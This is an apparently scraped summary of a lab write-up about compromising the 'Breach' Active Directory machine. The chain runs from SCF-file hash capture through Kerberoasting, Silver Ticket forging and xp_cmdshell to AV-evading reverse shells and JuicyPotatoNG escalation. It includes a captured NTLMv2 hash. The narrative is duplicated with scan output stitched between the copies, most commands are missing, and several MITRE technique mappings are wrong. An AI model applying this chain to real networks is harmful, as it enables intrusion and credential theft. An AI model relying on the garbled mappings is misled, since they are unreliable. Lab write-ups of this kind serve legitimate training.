Keypoints :
- Maverick’s testing reveals a robust initial access path.
- Credentials for the Julia user were harvested for Kerberoasting.
- A Silver Ticket attack was utilized to access MSSQL.
- The AV systems installed were highly effective at killing shells.
- HoaxShell was employed to bypass AV defenses.
- Tools like smbclient and nxc were used for enumeration of SMB shares.
- JuicyPotato exploit was used for privilege escalation after identifying SeImpersonatePrivilege.
- BloodHound was employed to determine attack surface and identify Kerberoastable users.
- Kerberos-based attacks allowed unauthorized access to services.
- Multiple methods were used for uploading and executing scripts on the target machine.
MITRE Techniques :
- T1558.001 – Credential Dumping: Credential harvesting was performed on the Julia user to facilitate Kerberoasting.
- T1558.002 – Kerberoasting: A Silver Ticket attack was conducted using stolen credentials to gain access to MSSQL.
- T1075 – Pass the Ticket: Silver Ticket forged to gain access to services without needing a valid credential.
- T1037 – Boot or Logon Autostart Execution: SCF files were uploaded to execute malicious payloads through SMB.
- T1203 – Exploitation for Client Execution: HoaxShell was used to bypass AV and execute commands.
Indicator of Compromise :
- [IP Address] 10.10.67.132
- [Domain] breach.vl
- [Username] Julia.Wong
- [Username] svc_mssql
- [Hash Type] NTLM Hash for Julia.Wong: Julia.Wong::BREACH:5a8fd7c86d8a60e7:7F50D2736306C0AC15E302BC44EAC1CE
Full Story: https://infosecwriteups.com/breach-vulnlab-malicious-file-upload-to-smb-kerberoasting-silver-ticket-and-av-shenanigans-dbaf0cb2a72e?source=rss—-7b722bfd1b8d—4 , ‘ipc
As you can see, there’s read and write permissions on “Share”, while “Users” and “IPC$” are read-only. I logged into “Share” and found some juicy stuff, as shown in smbclient. Now, I’ll try uploading a malicious file to SMB to capture NTLM hashes.
Attention: In usual AD testing, you should dig deep for users and gather as many as possible to check their validity. This helps with attacks like Kerberoasting, AS-REP roasting, and of course, password spraying. But I won’t do that this time because, as I said before, I’ve already covered it. If you’re not familiar with this, I highly recommend reading my previous write-ups to dive deeper into the process.
Inspired by a ton of articles on this attack, I found a great tool that automates creating the SCF file and uploads it for me. After that, I simply ran Responder to grab those sweet NTLM hashes.
I uploaded the SCF file using a one-liner command and ran Responder to start listening for incoming NTLM hashes.
Is this attack familiar to you? 😏 Have you ever done an LLMNR/NBNS poisoning attack before? Oh man, you’re tough! 💪🔥
And here we go with the hash! 🎉 Let’s try cracking it with John — though if you’re feeling fancy, you can use Hashcat instead .Your call! 😈🔥
After running — show, we got our creds. Now it’s time to check their validity using netexec, as usual. The creds are valid for SMB, LDAP, and MSSQL, giving us multiple ways to move forward.
Now, there are two things we should do:
- Run BloodHound with these creds to map out the attack surface and see what opportunities we have.
- Think like an attacker — dig deeper with a breach mindset, just like in a real engagement.
But if you just want the flag? 🤔 Simply run -M spider_plus in netexec, and you’ll find transferjulia.wong, where you can grab local.txt—aka the user.txt flag.
Running BloodHound to See Attack Surface
After running BloodHound, I spotted a Kerberoastable user — svc_mssql. You can also find this manually using impacket-GetUserSPNs or by using netexec. But this time, netexec did it automatically for us.
When I checked Julia’s creds using netexec, it gave me the Kerberoastable hash. But just for you, bruh, I’ll use impacket-GetUserSPNs to get it as well. 😏
As we saw in BloodHound, the svc_mssql user has a Machine SPN, making it vulnerable to Kerberoasting. Alright, let’s crack this hash using Hashcat and see what we get!
As I mentioned before, if you log in to MSSQL using Julia’s creds, you can’t run xp_cmdshell — and even with svc_mssql creds, you still can’t. To bypass this, you need to create a Silver Ticket first.
A Silver Ticket Attack allows an attacker to forge authentication tickets in Active Directory, granting unauthorized access to network resources without needing valid credentials. After that, we will pass our ticket, which gives us the capability to run MSSQL with proper permissions — and then, we’ll drop a reverse shell.
A Silver Ticket Attack is a Kerberos-based attack where an attacker forges a service ticket (TGS) instead of the TGT (Ticket Granting Ticket). This allows unauthorized access to a specific service without needing to communicate with the Domain Controller (KDC). Since Silver Tickets are generated offline and don’t require KDC validation, they can be harder to detect compared to Golden Ticket Attacks. After forging the Silver Ticket, we pass it to the target service, which gives us elevated access. From there, we’ll execute MSSQL commands with higher permissions — and finally, drop a reverse shell.
How to Craft a Silver Ticket
1️⃣ Get the Domain SID
2️⃣ Extract the NTLM Hash of the Target User
3️⃣ Find the Service Principal Name (SPN)
4️⃣ Forge the Silver Ticket using impacket-ticketer
5️⃣ Pass the Ticket to the Target System
6️⃣ Access the Target Service with Elevated Permissions
1️⃣ Get the Domain SID by using impacket-lookupsid.
2️⃣ User NTLM Hash — I just provided the NTLM hash generator with the plaintext password to get the hash for svc_mssql.
3️⃣ Service Principal Name (SPN) — I will use impacket-GetUserSPNs, just like I did for Kerberoasting before.
Now, let’s put everything together using impacket-ticketer to execute the attack and generate a TGS ticket.
after doing tthe impacket-ticketer command i ptt with export and make imapcket-msssql and voila now we have privilege to enable xp_cm dshell
Okay, bro, now what we need is very simple — just run a PowerShell reverse shell from impacket-mssqlclient after enabling xp_cmdshell.
But at this stage, it was tough because AV blocked the malicious PowerShell reverse shell. You could use any implant from a C2 framework like Havoc or Sliver, but I chose the easy way. So, I ran HoaxShell, which provided an evasive PowerShell payload to bypass AV. 🔥
And here we go! 🚀 Now, we need some situational awareness.
You can upload WinPEAS, Seatbelt, Windows Privilege Checker, or any privilege escalation tool you prefer. But first, let’s check what privileges we already have! 🔍
After running whoami /all, I saw that we have SeImpersonatePrivilege. To abuse this, we can use any Potato exploit… but did you forget about the AV? 🤡 LOL, it will kill your payloads, just like it did to mine!
Anyway, let me walk you through exactly what I did:
1️⃣ Transferred JuicyPotatoNG and an evasive version of nc.
2️⃣ Set up the listener—now we’re ready to roll! 🚀
To transfer nc, I used a simple PowerShell command:
To transfer JuicyPotatoNG, I used PowerShell:
And of course, you can use any method to transfer files — there are a ton of ways!
Once transferred, it was time to execute the exploit and escalate privileges! 🔥🚀
impacket-smbserver if you want to as well.🛡️ Defense & Remediation Strategies 🛡️
References
- SMB SCF File Attack: https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/
- NetCat64: https://github.com/vinsworldcom/NetCat64
- JuicyPotatoNG v1.1: https://github.com/antonioCoco/JuicyPotatoNG/releases/tag/v1.1
- Giving JuicyPotato a Second Chance: https://decoder.cloud/2022/09/21/giving-juicypotato-a-second-chance-juicypotatong/
- HoaxShell: https://github.com/t3l3machus/hoaxshell
- MSSQL for Pentesters (xp_cmdshell Execution): https://www.hackingarticles.in/mssql-for-pentester-command-execution-with-xp_cmdshell/
- Windows Privilege Escalation (Potatoes Collection): https://jlajara.gitlab.io/Potatoes_Windows_Privesc
- Making nc.exe Viable Again (Bypassing Defender): https://steve-s.gitbook.io/0xtriboulet/deceiving-defender/deceiving-defender-making-nc.exe-viable-again
- Kerberos Tickets (Swissky’s Guide): https://swisskyrepo.github.io/InternalAllTheThings/active-directory/kerberos-tickets/
- Silver & Golden Ticket Attacks: https://en.hackndo.com/kerberos-silver-golden-tickets/
Do You Wanna Chat with Maverick?🥂
Don’t forget to follow me on LinkedIn and Twitter, and give me some respect on Hack The Box! i love chatting with like-minded people, sharing knowledge, and learning from everyone. Happy hacking! 🚀
[/hidden_content]
Full Story: https://infosecwriteups.com/breach-vulnlab-malicious-file-upload-to-smb-kerberoasting-silver-ticket-and-av-shenanigans-dbaf0cb2a72e?source=rss—-7b722bfd1b8d—4 ]
SPIDER_PLUS 10.10.67.132 445 BREACHDC [*] EXCLUDE_EXTS: [‘ico’, ‘lnk’]
SPIDER_PLUS 10.10.67.132 445 BREACHDC [*] MAX_FILE_SIZE: 50 KB
SPIDER_PLUS 10.10.67.132 445 BREACHDC [*] OUTPUT_FOLDER: /tmp/nxc_hosted/nxc_spider_plus
SMB 10.10.67.132 445 BREACHDC [*] Enumerated shares
SMB 10.10.67.132 445 BREACHDC Share Permissions Remark
SMB 10.10.67.132 445 BREACHDC —– ———– ——
SMB 10.10.67.132 445 BREACHDC ADMIN$ Remote Admin
SMB 10.10.67.132 445 BREACHDC C$ Default share
SMB 10.10.67.132 445 BREACHDC IPC$ READ Remote IPC
SMB 10.10.67.132 445 BREACHDC NETLOGON Logon server share
SMB 10.10.67.132 445 BREACHDC share READ,WRITE
SMB 10.10.67.132 445 BREACHDC SYSVOL Logon server share
SMB 10.10.67.132 445 BREACHDC Users READ
SPIDER_PLUS 10.10.67.132 445 BREACHDC [+] Saved share-file metadata to “/tmp/nxc_hosted/nxc_spider_plus/10.10.67.132.json”.
SPIDER_PLUS 10.10.67.132 445 BREACHDC [*] SMB Shares: 7 (ADMIN$, C$, IPC$, NETLOGON, share, SYSVOL, Users)
SPIDER_PLUS 10.10.67.132 445 BREACHDC [*] SMB Readable Shares: 3 (IPC$, share, Users)
SPIDER_PLUS 10.10.67.132 445 BREACHDC [*] SMB Writable Shares: 1 (share)
SPIDER_PLUS 10.10.67.132 445 BREACHDC [*] SMB Filtered Shares: 1
SPIDER_PLUS 10.10.67.132 445 BREACHDC [*] Total folders found: 63
SPIDER_PLUS 10.10.67.132 445 BREACHDC [*] Total files found: 67
SPIDER_PLUS 10.10.67.132 445 BREACHDC [*] File size average: 27.75 KB
SPIDER_PLUS 10.10.67.132 445 BREACHDC [*] File size min: 3 B
SPIDER_PLUS 10.10.67.132 445 BREACHDC [*] File size max: 512 KB
As you can see, there’s read and write permissions on “Share”, while “Users” and “IPC$” are read-only. I logged into “Share” and found some juicy stuff, as shown in smbclient. Now, I’ll try uploading a malicious file to SMB to capture NTLM hashes.
Attention: In usual AD testing, you should dig deep for users and gather as many as possible to check their validity. This helps with attacks like Kerberoasting, AS-REP roasting, and of course, password spraying. But I won’t do that this time because, as I said before, I’ve already covered it. If you’re not familiar with this, I highly recommend reading my previous write-ups to dive deeper into the process.
Inspired by a ton of articles on this attack, I found a great tool that automates creating the SCF file and uploads it for me. After that, I simply ran Responder to grab those sweet NTLM hashes.
I uploaded the SCF file using a one-liner command and ran Responder to start listening for incoming NTLM hashes.
Is this attack familiar to you? 😏 Have you ever done an LLMNR/NBNS poisoning attack before? Oh man, you’re tough! 💪🔥
And here we go with the hash! 🎉 Let’s try cracking it with John — though if you’re feeling fancy, you can use Hashcat instead .Your call! 😈🔥
After running — show, we got our creds. Now it’s time to check their validity using netexec, as usual. The creds are valid for SMB, LDAP, and MSSQL, giving us multiple ways to move forward.
Now, there are two things we should do:
- Run BloodHound with these creds to map out the attack surface and see what opportunities we have.
- Think like an attacker — dig deeper with a breach mindset, just like in a real engagement.
But if you just want the flag? 🤔 Simply run -M spider_plus in netexec, and you’ll find transferjulia.wong, where you can grab local.txt—aka the user.txt flag.
Running BloodHound to See Attack Surface
After running BloodHound, I spotted a Kerberoastable user — svc_mssql. You can also find this manually using impacket-GetUserSPNs or by using netexec. But this time, netexec did it automatically for us.
When I checked Julia’s creds using netexec, it gave me the Kerberoastable hash. But just for you, bruh, I’ll use impacket-GetUserSPNs to get it as well. 😏
As we saw in BloodHound, the svc_mssql user has a Machine SPN, making it vulnerable to Kerberoasting. Alright, let’s crack this hash using Hashcat and see what we get!
As I mentioned before, if you log in to MSSQL using Julia’s creds, you can’t run xp_cmdshell — and even with svc_mssql creds, you still can’t. To bypass this, you need to create a Silver Ticket first.
A Silver Ticket Attack allows an attacker to forge authentication tickets in Active Directory, granting unauthorized access to network resources without needing valid credentials. After that, we will pass our ticket, which gives us the capability to run MSSQL with proper permissions — and then, we’ll drop a reverse shell.
A Silver Ticket Attack is a Kerberos-based attack where an attacker forges a service ticket (TGS) instead of the TGT (Ticket Granting Ticket). This allows unauthorized access to a specific service without needing to communicate with the Domain Controller (KDC). Since Silver Tickets are generated offline and don’t require KDC validation, they can be harder to detect compared to Golden Ticket Attacks. After forging the Silver Ticket, we pass it to the target service, which gives us elevated access. From there, we’ll execute MSSQL commands with higher permissions — and finally, drop a reverse shell.
How to Craft a Silver Ticket
1️⃣ Get the Domain SID
2️⃣ Extract the NTLM Hash of the Target User
3️⃣ Find the Service Principal Name (SPN)
4️⃣ Forge the Silver Ticket using impacket-ticketer
5️⃣ Pass the Ticket to the Target System
6️⃣ Access the Target Service with Elevated Permissions
1️⃣ Get the Domain SID by using impacket-lookupsid.
2️⃣ User NTLM Hash — I just provided the NTLM hash generator with the plaintext password to get the hash for svc_mssql.
3️⃣ Service Principal Name (SPN) — I will use impacket-GetUserSPNs, just like I did for Kerberoasting before.
Now, let’s put everything together using impacket-ticketer to execute the attack and generate a TGS ticket.
after doing tthe impacket-ticketer command i ptt with export and make imapcket-msssql and voila now we have privilege to enable xp_cm dshell
Okay, bro, now what we need is very simple — just run a PowerShell reverse shell from impacket-mssqlclient after enabling xp_cmdshell.
But at this stage, it was tough because AV blocked the malicious PowerShell reverse shell. You could use any implant from a C2 framework like Havoc or Sliver, but I chose the easy way. So, I ran HoaxShell, which provided an evasive PowerShell payload to bypass AV. 🔥
And here we go! 🚀 Now, we need some situational awareness.
You can upload WinPEAS, Seatbelt, Windows Privilege Checker, or any privilege escalation tool you prefer. But first, let’s check what privileges we already have! 🔍
After running whoami /all, I saw that we have SeImpersonatePrivilege. To abuse this, we can use any Potato exploit… but did you forget about the AV? 🤡 LOL, it will kill your payloads, just like it did to mine!
Anyway, let me walk you through exactly what I did:
1️⃣ Transferred JuicyPotatoNG and an evasive version of nc.
2️⃣ Set up the listener—now we’re ready to roll! 🚀
To transfer nc, I used a simple PowerShell command:
To transfer JuicyPotatoNG, I used PowerShell:
And of course, you can use any method to transfer files — there are a ton of ways!
Once transferred, it was time to execute the exploit and escalate privileges! 🔥🚀
impacket-smbserver if you want to as well.🛡️ Defense & Remediation Strategies 🛡️
References
- SMB SCF File Attack: https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/
- NetCat64: https://github.com/vinsworldcom/NetCat64
- JuicyPotatoNG v1.1: https://github.com/antonioCoco/JuicyPotatoNG/releases/tag/v1.1
- Giving JuicyPotato a Second Chance: https://decoder.cloud/2022/09/21/giving-juicypotato-a-second-chance-juicypotatong/
- HoaxShell: https://github.com/t3l3machus/hoaxshell
- MSSQL for Pentesters (xp_cmdshell Execution): https://www.hackingarticles.in/mssql-for-pentester-command-execution-with-xp_cmdshell/
- Windows Privilege Escalation (Potatoes Collection): https://jlajara.gitlab.io/Potatoes_Windows_Privesc
- Making nc.exe Viable Again (Bypassing Defender): https://steve-s.gitbook.io/0xtriboulet/deceiving-defender/deceiving-defender-making-nc.exe-viable-again
- Kerberos Tickets (Swissky’s Guide): https://swisskyrepo.github.io/InternalAllTheThings/active-directory/kerberos-tickets/
- Silver & Golden Ticket Attacks: https://en.hackndo.com/kerberos-silver-golden-tickets/
Do You Wanna Chat with Maverick?🥂
Don’t forget to follow me on LinkedIn and Twitter, and give me some respect on Hack The Box! i love chatting with like-minded people, sharing knowledge, and learning from everyone. Happy hacking! 🚀
[/hidden_content]